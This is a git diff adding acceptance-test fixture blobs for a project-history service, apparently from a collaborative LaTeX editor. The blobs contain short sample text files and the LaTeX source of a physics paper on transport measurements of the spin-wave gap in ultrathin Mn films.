interaction-induced quantum correction +found to be dominant in the case of ferromagnetic Gd +films which undergo a metal-insulator transition\cite{misra_2011} is +found to be much smaller in the present case and will not be considered further (for an estimate of this contribution see \cite{muttalib_unpub}. + +As discussed in detail in Ref.~[\onlinecite{wm10}], the phase relaxation +time $\tau _{\varphi }$ limits the phase coherence in a particle-particle +diffusion propagator $C(q,\omega )$ (Cooperon) in the form +\begin{equation} +C(q,\omega _{l})=\frac{1}{2\pi N_{0}\tau ^{2}}\frac{1}{Dq^{2}+|\omega +_{l}|+1/\tau _{\varphi }}. +\end{equation} +where $N_{0}$ is the density of states at the Fermi level, $\tau $ is the +elastic scattering time and $\omega _{l}=2\pi lT$ is the Matsubara +frequency. Labeling the Cooperon propagator in the absence of interactions +as $C_{0}$, we can write +\begin{equation} +\frac{1}{\tau _{\varphi }}=\frac{1}{2\pi N_{0}\tau ^{2}}[C^{-1}-C_{0}^{-1}]. +\end{equation} + +In general, $C(q,\omega )$ can be evaluated diagrammatically in the presence +of interactions and disorder in a ladder approximation \cite{fa} that can be +symbolically written as $C=C_{0}+C_{0}KC$ where the interaction vertex $K$ +contains self energy as well as vertex corrections due to both interactions +and disorder. It then follows that $1/\tau _{\varphi }$ is given by +\begin{equation} +\frac{1}{\tau _{\varphi }}=-\frac{1}{2\pi N_{0}\tau ^{2}}K. +\end{equation}% +In Ref.~[\onlinecite{wm10}], the leading temperature and disorder dependence +of the inelastic diffusion propagator was evaluated diagrammatically, in the +presence of ferromagnetic spin-wave mediated electron-electron interactions. +Here we consider the antiferromagnetic case. We only consider large +spin-wave gap where the damping can be ignored. Using the antiferromagnetic +dispersion relation $\omega _{q}=\Delta +Aq$, where $A$ is the spin +stiffness, the inelastic lifetime is given by +\be +\frac{\hbar }{\tau _{\varphi }}=\frac{4}{\pi \hbar }nJ^{2}\int_{0}^{1/l}% +\frac{q^{d-1}dq}{\sinh \beta \omega _{q}}\frac{Dq^{2}+1/\tau _{\varphi }}{% +(Dq^{2}+1/\tau _{\varphi })^{2}+\omega _{q}^{2}} +\ee% +where $n=k_{F}^{3}/3\pi ^{2}$ is the 3d density, $J$ is the effective +spin-exchange interaction and $\beta =1/k_{B}T$. Here we will consider the +limit $\hbar /\tau _{\varphi }\ll \Delta $, relevant for our experiment on +Mn. In this limit we can neglect the $1/\tau _{\varphi }$ terms inside the +integral. The upper limit should be restricted to $\Delta /A$ in the limit $% +\Delta /A<1/l$. For large disorder, we expect the parameter $x\equiv +\hbar Dk_{F}^{2}\Delta / \bar{J}^{2}\ll 1$, where the spin-exchange energy +is given by $\bar{J}=Ak_{F}$. In this limit, $L_{\varphi }$ can be +simplified as +\be +k_{F}L_{\varphi }\approx \left( \frac{\bar{J}}{\Delta }\right) ^{3/2}\left( +\frac{5\sinh \frac{\Delta }{T}}{12\pi }\right) ^{1/2},\;\;\;x\ll 1 +\label{L-phi-3d} +\ee% +which is independent of $x$, and therefore, independent of disorder. + +Given the inelastic lifetime, the weak localization correction in 3d is +usually given by \cite{lee_1985} $\delta \sigma _{3d}=\frac{e^{2}}{\hbar \pi +^{3}}\frac{1}{L_{\varphi }},$ where the prefactor to the inverse inelastic +length is a universal number, independent of disorder. However, at large +enough disorder, we show that there exists a disorder dependent correction, +due to the scale dependent diffusion coefficient near the Anderson +metal-insulator transition. In fact, the diffusion coefficient obeys the +self consistent equation \cite{WV} +\begin{equation} +\frac{D_{0}}{D(\omega )}=1+\frac{k_{F}^{2-d}}{\pi m}\int_{0}^{1/l}dQ\frac{% +Q^{d-1}}{-i\omega +D(\omega )Q^{2}} +\end{equation}% +where $D_{0}=v_{F}l/d$ is the diffusion coefficient at weak disorder. While +the significance of the prefactor to the integral is not clear, the above +equation remains qualitatively accurate over a wide range near the Anderson +transition. Setting $\omega =i/\tau _{\varphi }$ and doing the $Q$-integral +in 3d, +\bea +\frac{D_{0}}{D} &\approx & 1+\frac{1}{\pi mk_{F}}\int_{1/L_{\phi }}^{1/l}dQ\frac{% +Q^{2}}{DQ^{2}}\cr +&=& 1+\frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}-\delta +\left( \frac{D_{0}}{D}\right) , +\label{delta} +\eea% +where +\bea +\delta \equiv \frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{% +L_{\varphi }} +\eea +is assumed to be a small correction, and Eq.~(\ref{delta}) +should not be solved self-consistently. This follows from the fact that the +diffusion coefficient of electrons at fixed energy entering the Cooperon +expression is that of non-interacting electrons, and is given by the limit $% +T\rightarrow 0$, $L_{\varphi }\rightarrow \infty $ and therefore $\delta +\rightarrow 0$. Then the correction at finite $T$ is given by +\bea +\frac{D}{D_{0}} &=& \frac{1}{\left( \frac{D_{0}}{D}\right) _{0}-\delta \left( +\frac{D_{0}}{D}\right) }\cr +&\approx & \left( \frac{D}{D_{0}}\right) _{0}+\left( \frac{D}{D_{0}}\right) _{0} +\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{L_{\varphi }}% +\eea% +where +\be +\lim_{T\rightarrow 0}\frac{D}{D_{0}}\equiv \left( \frac{D}{D_{0}}\right) +_{0}. +\ee% +Using the relation $\sigma _{3d}=(e^{2}/\hbar )nD$ where the longitudinal +sheet conductance $\sigma _{\square }=\sigma _{3d}t$, with $t$ being the +film thickness, we finally get the temperature dependent weak localization +correction term +\bea +\frac{\delta \sigma _{\square }}{L_{00}} &=& \left( \frac{D}{D_{0}}\right) _{0}% +\frac{2}{\pi }\frac{t}{L_{\varphi }}\cr +\left( \frac{D}{D_{0}}\right)_{0} &\approx &\frac{2}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}} +\label{WL} +\eea% +where $R_{0}=L_{00}/\sigma _{\square }(T$=$0)$, $L_{00}=e^{2}/\pi h$, $% +a=3\pi/2k_{F}tb_{0}$, $b_{0}$ is a number of order unity and we +have solved the self-consistent equation for $D$ in order to express $D_{0% +\text{ }}$in terms of $D$ and finally $R_{0}$. Thus in this case, the weak +localization correction has a prefactor which is not universal. While this +reduces to the well-known universal result at weak disorder $R_{0}\ll a$, it +becomes dependent on disorder characterized by the sheet resistance $R_{0}$ +at strong disorder and at the same time substantially extends the 3d regime +near the transition. + +Using the expression for $L_{\varphi }$ (Eq.~(\ref{L-phi-3d})) into Eq.~(\ref% +{WL}), we finally obtain the total conductivity, including the quantum +correction to the conductivity due to weak localization in 3d arising from +scattering of electrons off antiferromagnetic spin waves in Mn, +\begin{equation} +\frac{\sigma _{\square }}{L_{00}}=A+\frac{B}{\sqrt{\sinh [\Delta /T]}}, +\label{sigmaWL} +\end{equation}% +\textbf{\textbf{}}where the parameter $A$ is temperature independent and the parameter +\bea +B &\equiv & \left( \frac{D}{D_{0}}\right) _{0}\frac{2}{\pi ^{2}}\left( \frac{% +12\pi }{5}\right) ^{1/2}\left( \frac{\Delta }{\bar{J}}\right) ^{3/2}tk_{F}\cr% +&=&\frac{2c}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}}, +\label{BFit} +\eea% +where +\be +c\equiv \left( \frac{\Delta }{\bar{J}}\right) ^{3/2}\left( \frac{% +48t^{2}k_{F}^{2}}{5\pi}\right) ^{1/2}. +\label{cFit} +\ee + +The data presented here is for a single film prepared with an initial $R_0 +\approx$~6~k$\Omega$. Disorder was consequently increased in incremental +stages up to 180~k$\Omega$ by annealing at approximately 280~K~\cite% +{misra_2011}. Additional samples were grown at intermediate disorder and +measured to check reproducibility. + +Figure~\ref{fig:cond} shows the conductivity data for two samples with +disorder $R_{0}=$~17573~$\Omega $ and 63903~$\Omega $ with corresponding +fittings to the expression (\ref{sigmaWL}) where $A$ and $B$ are taken as +fitting parameters and $\Delta =$~16~K is the spin wave gap. The fits are +sensitive to the parameters $A$ and $B$ but relatively insensitive to $% +\Delta $. We find that $\Delta =$~16~$\pm $~4~K provides good fittings in +the whole range of disorder (from 6 to 180~k$\Omega $). + +\begin{figure}[tbp] +\begin{center} +\includegraphics[width=9cm]{fig_1_16.eps} +\end{center} +\caption{The temperature-dependent normalized conductivity (open squares) +for two samples with the indicated disorder strengths of $R_0 =$~17573~$% +\Omega$ and 63903~$\Omega$ show good agreement with theory (solid lines). +The fitting parameters $A$ and $B$ are indicated for each curve with the +error in the least significant digit indicated in parentheses.} +\label{fig:cond} +\end{figure} + +Figure~\ref{fig:parb} shows the dependence of the parameter $B$ on the +disorder strength $R_0$ (open squares) and a theoretical fit (solid line) +using Eq.~(\ref{BFit}), where $c$ and $a$ are fitting parameters. The solid +line for this two-paramener fit is drawn for the best-fit values $c=0.67 \pm +0.04$ and $a= 28 \pm 3$~k$\Omega$. We note that the fit is of reasonable +quality over most of the disorder range except for the film with the least +disorder ($R_0 = 6$~k$\Omega$) where $B = 0.77$, +somewhat below the saturated value +$B = c = 0.67$ evaluated from Eq.~(\ref{BFit}) at $R_0 = 0$. Using higher +values of $c$ (e.g., $c=0.8$) and lower values of $a$ (eg., $a = 22$~k$\Omega$) +improves the fit at low disorder strengths but +increases the discrepancy at higher disorder strengths. + +%L_phi/t = 2/pi*2/(1+sqrt(1+16))/0.5, 2/pi*2/(1+sqrt(1+1))/0.25 + +%http://hyperphysics.phy-astr.gsu.edu/hbase/tables/fermi.html , k_F = sqrt(2*m_e*(10.9 eV))/(hbar) = 1.7E10 1/m + +% (bar(J) / \Delta) ^ 3/2 = (48*(2e-9)^2*(2.7e9)^2/5/pi/(0.65)^2) ^0.5 = 8360 = 20 ^ 3 +%A = \bar{J} / k_F , \bar{J} = nJ + +Substituting the Fermi energy for bulk Mn~\cite{ashcroft_1976}, +a thickness $t=2$~nm known to 20\% accuracy, together with the best-fit +value for $c$ into Eq.~(\ref{cFit}), we calculate the value $\bar{J} =$~320~$% +\pm$~93~K. Gao et al.~\cite{gao_2008} performed inelastic scanning tunneling +spectroscopy (ISTS) on thin Mn films and reported $\Delta$ in the range from +30 to 60~K and $\bar{J}=vk_F=$~3150~$\pm$~200~K. The agreement of energy gaps is +good; however our significantly lower value of $\bar{J}$ is probably due to the +high disorder in our ultra thin films. + +Since the temperature-dependent correction $B/\sqrt{\sinh (\Delta /T)}$ of +Eq.~\ref{sigmaWL} is small compared to the parameter $A$, we can write +$\sigma_{\square} \approx 1/R_0$ so that Eq.~\ref{sigmaWL} reduces to the +expression $A \approx 1/L_{00}R_0$. The logarithmic plot derived by taking the +logarithm of both sides of this approximation is shown in the inset of +Fig.~\ref{fig:parb}. The slope of -1 confirms the linear dependence of $A$ on +$1/R_0$ and the intercept of 5.01 (10$^{5.01}\approx $~102~k$\Omega$) is +within 20\% of the expected theoretical value $L_{00}=$~81~k$\Omega $, +for the normalization constant. Accordingly, the conductivity corrections in +Eq.~\ref{sigmaWL} are small compared to the zero temperature conductivity and +the normalization constant $L_{00}$ for the conductivity is close to the +expected theoretical value. + +Using Eq.~(\ref{WL}) and the obtained value for $a\approx $~28~k$\Omega $ we can +compare the dephasing length ($L_{\varphi }$) with the thickness ($t\approx $% +~2~nm) at 16~K. For the sample with $R_{0}=$~63903~$\Omega $ the ratio $% +L_{\varphi }/t\approx $~0.5 and for the sample with $R_{0}=$~17573~$\Omega $ +$L_{\varphi }/t\approx $~2. The latter estimate assumes no spin +polarization, while a full polarization would imply $L_{\varphi }/t\approx $% +~1. Thus $L_{\varphi }$ is smaller than or close to the thickness of the +film, which keeps the film in the three-dimensional regime for almost all +temperatures and disorder strengths considered. + +\begin{figure}[tbp] +\begin{center} +\includegraphics[width=9cm]{fig_2_16.eps} +\end{center} +\caption{Dependence of the fitting parameters $B$ and $A$ (inset) on +disorder $R_0$ for $\Delta=$~16~K. The fitting parameters are indicated for +each curve with the error in the least significant digit indicated in +parentheses.} +\label{fig:parb} +\end{figure} + +In conclusion, we have performed \textit{in situ} transport measurements on +ultra thin Mn films, systematically varying the disorder ($R_{0}=R_{xx}$($T=$% +~5~K)). The obtained data were analyzed within a weak localization theory in +3d generalized to strong disorder. In the temperature range considered +inelastic scattering off spin waves is found to be strong giving rise to a +dephasing length shorter than the film thickness, which places these systems +into the 3d regime. The obtained value for the spin wave gap was close to +the one measured by Gao et al.~\cite{gao_2008} using ISTS, while the +exchange energy was much smaller. + +This work has been supported by the NSF under Grant No 1305783 (AFH). +PW thanks A.\ M.\ \ Finkel'stein for useful discussions and acknowledges +partial support through the DFG research unit "Quantum phase transitions". + +\bibliographystyle{apsrev} +\bibliography{bibl} + +\end{document} diff --git a/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 b/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 new file mode 100644 index 0000000..4f785a4 --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/4f785a4c192155b240e3042b3a7388b47603f423 @@ -0,0 +1,3 @@ +Hello world + +One two three \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 b/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 new file mode 100644 index 0000000..c6654ea --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/c6654ea913979e13e22022653d284444f284a172 @@ -0,0 +1,5 @@ +Hello world + +One two three + +Four five six \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 b/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 new file mode 100644 index 0000000..e13c315 --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/e13c315d53aaef3aa34550a86b09cff091ace220 @@ -0,0 +1,7 @@ +Hello world + +One two three + +Four five six + +Seven eight nine \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d b/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d new file mode 100644 index 0000000..f28571f --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/blobs/f28571f561d198b87c24cc6a98b78e87b665e22d @@ -0,0 +1,404 @@ +% Choose pra, prb, prc, prd, pre, prl, prstab, or rmp for journal +% Add 'draft' option to mark overfull boxes with black boxes +% Add 'showpacs' option to make PACS codes appear +% for review and submission +%\documentclass[aps,preprint,showpacs,superscriptaddress,groupedaddress]{revtex4} % for double-spaced preprint +% needed for figures +% needed for some tables +% for math +% for math +% for crossing out text +% for coloring text +%\input{tcilatex} + + +\documentclass[aps,prl,twocolumn,showpacs,superscriptaddress,groupedaddress]{revtex4} + +\usepackage{graphicx} +\usepackage{dcolumn} +\usepackage{bm} +\usepackage{amssymb} +\usepackage{soul} +\usepackage{color} + +%TCIDATA{OutputFilter=LATEX.DLL} +%TCIDATA{Version=5.50.0.2960} +%TCIDATA{<META NAME="SaveForMode" CONTENT="1">} +%TCIDATA{BibliographyScheme=BibTeX} +%TCIDATA{LastRevised=Tuesday, May 20, 2014 03:06:00} +%TCIDATA{<META NAME="GraphicsSave" CONTENT="32">} + +\hyphenation{ALPGEN} +\hyphenation{EVTGEN} +\hyphenation{PYTHIA} +\def\be{\begin{equation}} +\def\ee{\end{equation}} +\def\bea{\begin{eqnarray}} +\def\eea{\end{eqnarray}} +%\input{tcilatex} + +\begin{document} + +\title{Transport measurements of the spin wave gap of Mn} +\input author_list.tex +\date{\today} + +\begin{abstract} +Temperature dependent transport measurements on ultrathin antiferromagnetic +Mn films reveal a heretofore unknown non-universal weak localization +correction to the conductivity which extends to disorder strengths greater than +100~k$\Omega$ per square. The inelastic scattering of electrons off of +gapped antiferromagnetic spin waves gives rise to an inelastic scattering +length which is short enough to place the system in the 3D regime. The +extracted fitting parameters provide estimates of the energy gap ($\Delta +\approx$~16~K) and exchange energy ($\bar{J} \approx$~320~K). %\st{which are in +%agreement with values obtained with other techniques}. +\end{abstract} + +\pacs{75} + +\maketitle + + + + + +Thin-film transition metal ferromagnets (Fe, Co, Ni, Gd) and +antiferromagnets (Mn, Cr) and their alloys are not only ubiquitous in +present day technologies but are also expected to play an important role in +future developments~\cite{thompson_2008}. Understanding magnetism in these +materials, especially when the films are thin enough so that disorder plays +an important role, is complicated by the long standing controversy about the +relative importance of itinerant and local moments~\cite% +{slater_1936,van_vleck_1953,aharoni_2000}. For the itinerant transition +metal magnets, a related fundamental issue centers on the question of how +itinerancy is compromised by disorder. Clearly with sufficient disorder the +charge carriers become localized, but questions arise as to what happens to +the spins and associated spin waves and whether the outcome depends on the +ferro/antiferro alignment of spins in the itinerant parent. Ferromagnets +which have magnetization as the order parameter are fundamentally different +than antiferromagnets which have staggered magnetization (i.e., difference +between the magnetization on each sublattice) as the order parameter~\cite% +{blundell_2001}. Ferromagnetism thus distinguishes itself by having soft +modes at zero wave number whereas antiferromagnets have soft modes at finite +wave number~\cite{belitz_2005}. Accordingly, the respective spin wave +spectrums are radically different. These distinctions are particularly +important when comparing quantum corrections to the conductivity near +quantum critical points for ferromagnets~\cite{paul_2005} and +antiferromagnets~\cite{syzranov_2012}. + +Surprisingly, although there have been systematic studies of the effect of +disorder on the longitudinal $\sigma_{xx}$ and transverse $\sigma_{xy}$ +conductivity of ferromagnetic films~\cite% +{bergmann_1978,bergmann_1991,mitra_2007,misra_2009,kurzweil_2009}, there +have been few if any such studies on antiferromagnetic films. In this paper +we remedy this situation by presenting transport data on systematically +disordered Mn films that are sputter deposited in a custom designed vacuum +chamber and then transferred without exposure to air into an adjacent +cryostat for transport studies to low temperature. The experimental +procedures are similar to those reported previously: disorder, characterized +by the sheet resistance $R_0$ measured at $T=$~5~K, can be changed either by +growing separate samples or by gentle annealing of a given sample through +incremental stages of disorder~\cite{misra_2011}. Using these same procedures our results for +antiferromagnets however are decidedly different. The data are well +described over a large range of disorder strengths by a non-universal three +dimensional (3d) quantum correction that applies only to spin wave gapped +antiferromagnets. This finding implies the presence of strong inelastic +electron scattering off of antiferromagnetic spin waves. The theory is +validated not only by good fits to the data but also by extraction from the +fitting parameters of a value for the spin wave gap $\Delta$ that is in +agreement with the value expected for Mn. On the other hand, the +exchange energy $\bar{J}$ could be sensitive to the high disorder in our +ultra thin films, and it turns out to be much smaller compared to the known values. + +In previous work the inelastic scattering of electrons off of spin waves has +been an essential ingredient in understanding disordered ferromagnets. For +example, to explain the occurrence of weak-localization corrections to the +anomalous Hall effect in polycrystalline Fe films~\cite{mitra_2007}, it was +necessary to invoke a contribution to the inelastic phase breaking rate $% +\tau_{\varphi}^{-1}$ due to spin-conserving inelastic scattering off +spin-wave excitations. This phase breaking rate, anticipated by theory~\cite% +{tatara_2004} and seen experimentally in spin polarized electron energy loss +spectroscopy (SPEELS) measurements of ultrathin Fe films~\cite% +{plihal_1999,zhang_2010}, is linear in temperature and significantly larger +than the phase breaking rate due to electron-electron interactions, thus +allowing a wide temperature range to observe weak localization corrections~% +\cite{mitra_2007}. The effect of a high $\tau_{\varphi}^{-1}$ due to +inelastic scattering off spin-wave excitations is also seen in Gd films +where in addition to a localizing log($T$) quantum correction to the +conductance, a localizing linear-in-$T$ quantum correction is present and is +interpreted as a spin-wave mediated Altshuler-Aronov type correction to the +conductivity~\cite{misra_2009}. + +Interestingly, this high rate of inelastic spin rate scattering becomes even +more important for the thinnest films as shown in theoretical calculations +on Fe and Ni which point to extremely short spin-dependent inelastic mean +free paths~\cite{hong_2000} and in spin-polarized electron energy-loss +spectroscopy (SPEELS) measurements on few monolayer-thick Fe/W(110) films in +which a strong nonmonotonic enhancement of localized spin wave energies is +found on the thinnest films~\cite{zhang_2010}. + +Inelastic spin wave scattering in highly disordered ferromagnetic films can +be strong enough to assure that the associated $T$-dependent dephasing +length $L_{\varphi }(T)=\sqrt{D\tau _{\varphi }}$ (with $D$ the diffusion +constant)~\cite{lee_1985} is less than the film thickness $t$, thus putting +thin films into the 3d limit where a metal-insulator +transition is observed~\cite{misra_2011}. Recognizing that similarly high +inelastic scattering rates must apply to highly disordered antiferromagnetic +films, we first proceed with a theoretical approach that takes into account +the scattering of antiferromagnetic spin waves on the phase relaxation rate +and find a heretofore unrecognized non-universal 3d weak localization +correction to the conductivity that allows an interpretation of our experimental +results. + +We mention in passing that the 3d interaction-induced quantum correction +found to be dominant in the case of ferromagnetic Gd +films which undergo a metal-insulator transition\cite{misra_2011} is +found to be much smaller in the present case and will not be considered further (for an estimate of this contribution see \cite{muttalib_unpub}. + +As discussed in detail in Ref.~[\onlinecite{wm10}], the phase relaxation +time $\tau _{\varphi }$ limits the phase coherence in a particle-particle +diffusion propagator $C(q,\omega )$ (Cooperon) in the form +\begin{equation} +C(q,\omega _{l})=\frac{1}{2\pi N_{0}\tau ^{2}}\frac{1}{Dq^{2}+|\omega +_{l}|+1/\tau _{\varphi }}. +\end{equation} +where $N_{0}$ is the density of states at the Fermi level, $\tau $ is the +elastic scattering time and $\omega _{l}=2\pi lT$ is the Matsubara +frequency. Labeling the Cooperon propagator in the absence of interactions +as $C_{0}$, we can write +\begin{equation} +\frac{1}{\tau _{\varphi }}=\frac{1}{2\pi N_{0}\tau ^{2}}[C^{-1}-C_{0}^{-1}]. +\end{equation} + +In general, $C(q,\omega )$ can be evaluated diagrammatically in the presence +of interactions and disorder in a ladder approximation \cite{fa} that can be +symbolically written as $C=C_{0}+C_{0}KC$ where the interaction vertex $K$ +contains self energy as well as vertex corrections due to both interactions +and disorder. It then follows that $1/\tau _{\varphi }$ is given by +\begin{equation} +\frac{1}{\tau _{\varphi }}=-\frac{1}{2\pi N_{0}\tau ^{2}}K. +\end{equation}% +In Ref.~[\onlinecite{wm10}], the leading temperature and disorder dependence +of the inelastic diffusion propagator was evaluated diagrammatically, in the +presence of ferromagnetic spin-wave mediated electron-electron interactions. +Here we consider the antiferromagnetic case. We only consider large +spin-wave gap where the damping can be ignored. Using the antiferromagnetic +dispersion relation $\omega _{q}=\Delta +Aq$, where $A$ is the spin +stiffness, the inelastic lifetime is given by +\be +\frac{\hbar }{\tau _{\varphi }}=\frac{4}{\pi \hbar }nJ^{2}\int_{0}^{1/l}% +\frac{q^{d-1}dq}{\sinh \beta \omega _{q}}\frac{Dq^{2}+1/\tau _{\varphi }}{% +(Dq^{2}+1/\tau _{\varphi })^{2}+\omega _{q}^{2}} +\ee% +where $n=k_{F}^{3}/3\pi ^{2}$ is the 3d density, $J$ is the effective +spin-exchange interaction and $\beta =1/k_{B}T$. Here we will consider the +limit $\hbar /\tau _{\varphi }\ll \Delta $, relevant for our experiment on +Mn. In this limit we can neglect the $1/\tau _{\varphi }$ terms inside the +integral. The upper limit should be restricted to $\Delta /A$ in the limit $% +\Delta /A<1/l$. For large disorder, we expect the parameter $x\equiv +\hbar Dk_{F}^{2}\Delta / \bar{J}^{2}\ll 1$, where the spin-exchange energy +is given by $\bar{J}=Ak_{F}$. In this limit, $L_{\varphi }$ can be +simplified as +\be +k_{F}L_{\varphi }\approx \left( \frac{\bar{J}}{\Delta }\right) ^{3/2}\left( +\frac{5\sinh \frac{\Delta }{T}}{12\pi }\right) ^{1/2},\;\;\;x\ll 1 +\label{L-phi-3d} +\ee% +which is independent of $x$, and therefore, independent of disorder. + +Given the inelastic lifetime, the weak localization correction in 3d is +usually given by \cite{lee_1985} $\delta \sigma _{3d}=\frac{e^{2}}{\hbar \pi +^{3}}\frac{1}{L_{\varphi }},$ where the prefactor to the inverse inelastic +length is a universal number, independent of disorder. However, at large +enough disorder, we show that there exists a disorder dependent correction, +due to the scale dependent diffusion coefficient near the Anderson +metal-insulator transition. In fact, the diffusion coefficient obeys the +self consistent equation \cite{WV} +\begin{equation} +\frac{D_{0}}{D(\omega )}=1+\frac{k_{F}^{2-d}}{\pi m}\int_{0}^{1/l}dQ\frac{% +Q^{d-1}}{-i\omega +D(\omega )Q^{2}} +\end{equation}% +where $D_{0}=v_{F}l/d$ is the diffusion coefficient at weak disorder. While +the significance of the prefactor to the integral is not clear, the above +equation remains qualitatively accurate over a wide range near the Anderson +transition. Setting $\omega =i/\tau _{\varphi }$ and doing the $Q$-integral +in 3d, +\bea +\frac{D_{0}}{D} &\approx & 1+\frac{1}{\pi mk_{F}}\int_{1/L_{\phi }}^{1/l}dQ\frac{% +Q^{2}}{DQ^{2}}\cr +&=& 1+\frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}-\delta +\left( \frac{D_{0}}{D}\right) , +\label{delta} +\eea% +where +\bea +\delta \equiv \frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{% +L_{\varphi }} +\eea +is assumed to be a small correction, and Eq.~(\ref{delta}) +should not be solved self-consistently. This follows from the fact that the +diffusion coefficient of electrons at fixed energy entering the Cooperon +expression is that of non-interacting electrons, and is given by the limit $% +T\rightarrow 0$, $L_{\varphi }\rightarrow \infty $ and therefore $\delta +\rightarrow 0$. Then the correction at finite $T$ is given by +\bea +\frac{D}{D_{0}} &=& \frac{1}{\left( \frac{D_{0}}{D}\right) _{0}-\delta \left( +\frac{D_{0}}{D}\right) }\cr +&\approx & \left( \frac{D}{D_{0}}\right) _{0}+\left( \frac{D}{D_{0}}\right) _{0} +\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{L_{\varphi }}% +\eea% +where +\be +\lim_{T\rightarrow 0}\frac{D}{D_{0}}\equiv \left( \frac{D}{D_{0}}\right) +_{0}. +\ee% +Using the relation $\sigma _{3d}=(e^{2}/\hbar )nD$ where the longitudinal +sheet conductance $\sigma _{\square }=\sigma _{3d}t$, with $t$ being the +film thickness, we finally get the temperature dependent weak localization +correction term +\bea +\frac{\delta \sigma _{\square }}{L_{00}} &=& \left( \frac{D}{D_{0}}\right) _{0}% +\frac{2}{\pi }\frac{t}{L_{\varphi }}\cr +\left( \frac{D}{D_{0}}\right)_{0} &\approx &\frac{2}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}} +\label{WL} +\eea% +where $R_{0}=L_{00}/\sigma _{\square }(T$=$0)$, $L_{00}=e^{2}/\pi h$, $% +a=3\pi/2k_{F}tb_{0}$, $b_{0}$ is a number of order unity and we +have solved the self-consistent equation for $D$ in order to express $D_{0% +\text{ }}$in terms of $D$ and finally $R_{0}$. Thus in this case, the weak +localization correction has a prefactor which is not universal. While this +reduces to the well-known universal result at weak disorder $R_{0}\ll a$, it +becomes dependent on disorder characterized by the sheet resistance $R_{0}$ +at strong disorder and at the same time substantially extends the 3d regime +near the transition. + +Using the expression for $L_{\varphi }$ (Eq.~(\ref{L-phi-3d})) into Eq.~(\ref% +{WL}), we finally obtain the total conductivity, including the quantum +correction to the conductivity due to weak localization in 3d arising from +scattering of electrons off antiferromagnetic spin waves in Mn, +\begin{equation} +\frac{\sigma _{\square }}{L_{00}}=A+\frac{B}{\sqrt{\sinh [\Delta /T]}}, +\label{sigmaWL} +\end{equation}% +\textbf{\textbf{}}where the parameter $A$ is temperature independent and the parameter +\bea +B &\equiv & \left( \frac{D}{D_{0}}\right) _{0}\frac{2}{\pi ^{2}}\left( \frac{% +12\pi }{5}\right) ^{1/2}\left( \frac{\Delta }{\bar{J}}\right) ^{3/2}tk_{F}\cr% +&=&\frac{2c}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}}, +\label{BFit} +\eea% +where +\be +c\equiv \left( \frac{\Delta }{\bar{J}}\right) ^{3/2}\left( \frac{% +48t^{2}k_{F}^{2}}{5\pi}\right) ^{1/2}. +\label{cFit} +\ee + +The data presented here is for a single film prepared with an initial $R_0 +\approx$~6~k$\Omega$. Disorder was consequently increased in incremental +stages up to 180~k$\Omega$ by annealing at approximately 280~K~\cite% +{misra_2011}. Additional samples were grown at intermediate disorder and +measured to check reproducibility. + +Figure~\ref{fig:cond} shows the conductivity data for two samples with +disorder $R_{0}=$~17573~$\Omega $ and 63903~$\Omega $ with corresponding +fittings to the expression (\ref{sigmaWL}) where $A$ and $B$ are taken as +fitting parameters and $\Delta =$~16~K is the spin wave gap. The fits are +sensitive to the parameters $A$ and $B$ but relatively insensitive to $% +\Delta $. We find that $\Delta =$~16~$\pm $~4~K provides good fittings in +the whole range of disorder (from 6 to 180~k$\Omega $). + +\begin{figure}[tbp] +\begin{center} +\includegraphics[width=9cm]{fig_1_16.eps} +\end{center} +\caption{The temperature-dependent normalized conductivity (open squares) +for two samples with the indicated disorder strengths of $R_0 =$~17573~$% +\Omega$ and 63903~$\Omega$ show good agreement with theory (solid lines). +The fitting parameters $A$ and $B$ are indicated for each curve with the +error in the least significant digit indicated in parentheses.} +\label{fig:cond} +\end{figure} + +Figure~\ref{fig:parb} shows the dependence of the parameter $B$ on the +disorder strength $R_0$ (open squares) and a theoretical fit (solid line) +using Eq.~(\ref{BFit}), where $c$ and $a$ are fitting parameters. The solid +line for this two-paramener fit is drawn for the best-fit values $c=0.67 \pm +0.04$ and $a= 28 \pm 3$~k$\Omega$. We note that the fit is of reasonable +quality over most of the disorder range except for the film with the least +disorder ($R_0 = 6$~k$\Omega$) where $B = 0.77$, +somewhat below the saturated value +$B = c = 0.67$ evaluated from Eq.~(\ref{BFit}) at $R_0 = 0$. Using higher +values of $c$ (e.g., $c=0.8$) and lower values of $a$ (eg., $a = 22$~k$\Omega$) +improves the fit at low disorder strengths but +increases the discrepancy at higher disorder strengths. + +%L_phi/t = 2/pi*2/(1+sqrt(1+16))/0.5, 2/pi*2/(1+sqrt(1+1))/0.25 + +%http://hyperphysics.phy-astr.gsu.edu/hbase/tables/fermi.html , k_F = sqrt(2*m_e*(10.9 eV))/(hbar) = 1.7E10 1/m + +% (bar(J) / \Delta) ^ 3/2 = (48*(2e-9)^2*(2.7e9)^2/5/pi/(0.65)^2) ^0.5 = 8360 = 20 ^ 3 +%A = \bar{J} / k_F , \bar{J} = nJ + +Substituting the Fermi energy for bulk 